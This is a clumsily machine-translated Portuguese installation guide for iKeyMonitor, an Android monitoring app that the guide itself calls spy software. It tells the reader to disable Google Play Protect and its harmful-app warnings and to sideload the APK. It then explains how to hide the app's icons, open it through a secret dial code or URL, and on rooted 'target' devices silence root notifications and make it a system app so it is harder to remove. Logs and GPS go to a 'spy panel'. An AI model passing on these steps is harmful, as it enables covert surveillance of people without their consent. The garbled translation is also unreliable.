Guia de Instalação iKeyMonitor Android

Pré-requisitos

Pule esta etapa se você não tiver o Google Play instalado (Por exemplo: para telefones China, o Google Play não está instalado por padrão).

Desativar o Google Play Proteja

Configurações > Google > Segurança > dispositivo de varredura para ameaças de segurança e Melhorar a detecção de aplicativo prejudicial (1,2,3)
Definido como "FORA

Desativar o Google Play Notificação Protect

• Em 7.x Android
    Configurações > notificações > Loja de aplicativos do Google > Bloqueie todos (1,2,3)
    Definido como "EM

• Em 8.x Android
    Configurações > Aplicativos e notificações > Veja todos os apps > Loja de aplicativos do Google > Notificações de aplicativo > Prioridade máxima (1,2,3)
    Definido como "FORA

Se você já tiver instalado iKeyMonitor e visto uma notificação “Desinstalar aplicativo prejudicial", então muito tempo pressionando a notificação e Vire a notificação “FORA“.

INSTALAR

1. Permitir aplicativo instala a partir de “fontes desconhecidas”

• Vamos para Configurações > Segurança > Tick “Fontes desconhecidas

2. Toque no arquivo baixado “iKeyMonitor-Android.apk” para instalá-lo

3. Abra-o após a instalação completa

Nota:
Se você escolher “Feito”Após a instalação, localize e toque no ícone iKeyMonitor na tela do dispositivo para iniciar o software.

4 maneiras de abrir iKeyMonitor:

Logo após a instalação, aplicação iKeyMonitor é lançado e começa a trabalhar em um modo de fundo. Os ícones que aparecem na tela inicial e barra de notificação pode ser desativado a partir Assistente iKeyMonitor. Consulte o seu guia. Para uma melhor experiência do usuário, existem 2 opções: ou para mantê-los exibido na tela inicial e notificação da barra do dispositivo monitorado ou não.

1. Visita https://ikeymonitor.com/openapp com o browser do telefone (Modo Oculto)
  2. Dial PIN # 8888 * com o teclado de discagem de chamadas (Modo Oculto)
  3. Toque no ícone iKeyMonitor na barra de notificação (modo visível)
  4. Toque no ícone iKeyMonitor na tela inicial (modo visível)

4. Para dispositivo enraizada, acesso root Grant iKeyMonitor e convertê-lo para Sistema App

• For rooted device, grant iKeyMonitor root access and change notificações para Desativado dentro Supersu/Superusuário.

Alternative: If Magisk is installed to root the target device, in mágica > Menu esquerdo superior > Configurações > superusuário Notificações, select “Nenhum” to turn off notification.

• Para dispositivo enraizada, converter iKeyMonitor a aplicação do sistema de iKeyMonitor - Configurações para torná-lo mais difícil de ser morto ou desinstalado. Reinicializar o dispositivo após a conversão.

CONFIGURAÇÃO

1. Enable "Internet/Network Service" in "Accessibility Service" and "Usage Access"

• Depois de logado, siga os diálogos de pop-up para permitir iKeyMonitor no Serviço de Acessibilidade, Acesso Uso e a otimização de bateria.

3. Configurações essencial para manter iKeyMonitor correr em background

• iKeyMonitor pode ser desativado / morto por Power Saver ou Task Cleaner do sistema Android, se você não configurar as definições essenciais.
  • Ver as definições essenciais Now!

• Go to "Device Management", check if your device is connected to the spy panel and view logs after some minutes.
  • iKeyMonitor carrega todos os registros a cada 5 minutos quando a tela do dispositivo é ON. Quando a tela está desligada (telefone de espera), apenas gps e registros circundantes serão carregados.
  • Confira o Guia do Usuário e FAQ se tiver dúvidas.